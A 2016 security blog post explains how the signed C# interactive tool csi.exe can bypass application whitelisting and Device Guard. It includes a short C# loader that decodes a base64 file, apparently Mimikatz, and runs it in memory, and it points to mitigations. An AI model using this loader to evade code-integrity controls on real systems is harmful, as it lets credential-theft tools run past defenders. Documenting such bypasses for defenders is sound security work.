Wednesday, September 28, 2016

Application Whitelisting Bypass - CSI.EXE C# Scripting

We’ve seen it before, where attackers can bring signed trusted tools to your system to expand functionality.  Attackers can bring tools signed by any vendor you may have approved in your whitelist.  Administrators often approve files at the publisher level to ease deployment.

Below is an example of bringing a signed, vulnerable driver to bypass kernel mode protections.

Recently, Matt Graeber (@mattifestation) demonstrated the ability to bypass Device Guard by bringing a signed debugger (windbg, cdb) to the system.

C# Scripting - hosted inside of csi.exe is another example of a signed tool that can be repurposed to bypass user-mode code integrity.  

“Before delving into the details of the new C# scripting, it’s important to understand the target scenarios. C# scripting is a tool for testing out your C# and .NET snippets without the effort of creating multiple unit testing or console projects. It provides a lightweight option for quickly coding up a LINQ aggregate method call on the command line, checking the .NET API for unzipping files, or invoking a REST API to figure out what it returns or how it works. It provides an easy means to explore and understand an API without the overhead...”

Basically, you can have C# code interpreted interactively, this is actually a great way to learn the language.  

In the example below I demonstrate the ability to load an arbitrary exe into csi.exe. This can be loaded from a basic text file. This is done on a PC running Windows Device Guard.

Screen Shot 2016-09-26 at 9.17.09 AM.png

using System;
using System.Reflection;

string s = System.IO.File.ReadAllText(@"katz.txt");
byte[] b = System.Convert.FromBase64String(s);
Assembly a = Assembly.Load(b);
MethodInfo method = a.EntryPoint;
object o = a.CreateInstance(method.Name);
method.Invoke(o, null);

Where katz.txt is the base64 encoded image file / assembly you wish to execute.

Again, this is misplaced trust, we need to trust many of the binaries signed by Microsoft. But not all of them...

An adversary would need to bring csi.exe + some dependencies, all said about 6MB, uncompressed.  I leave it to the reader to discover what those might be.

There is a great mitigation example for Device Guard to block “untrustable” sponsoring executables like this here:

Please refer to this list here:

For continued updates of bypasses that are discovered.

Screen Shot 2016-09-26 at 9.29.54 AM.png

That’s all I have for today,



No comments:

Post a Comment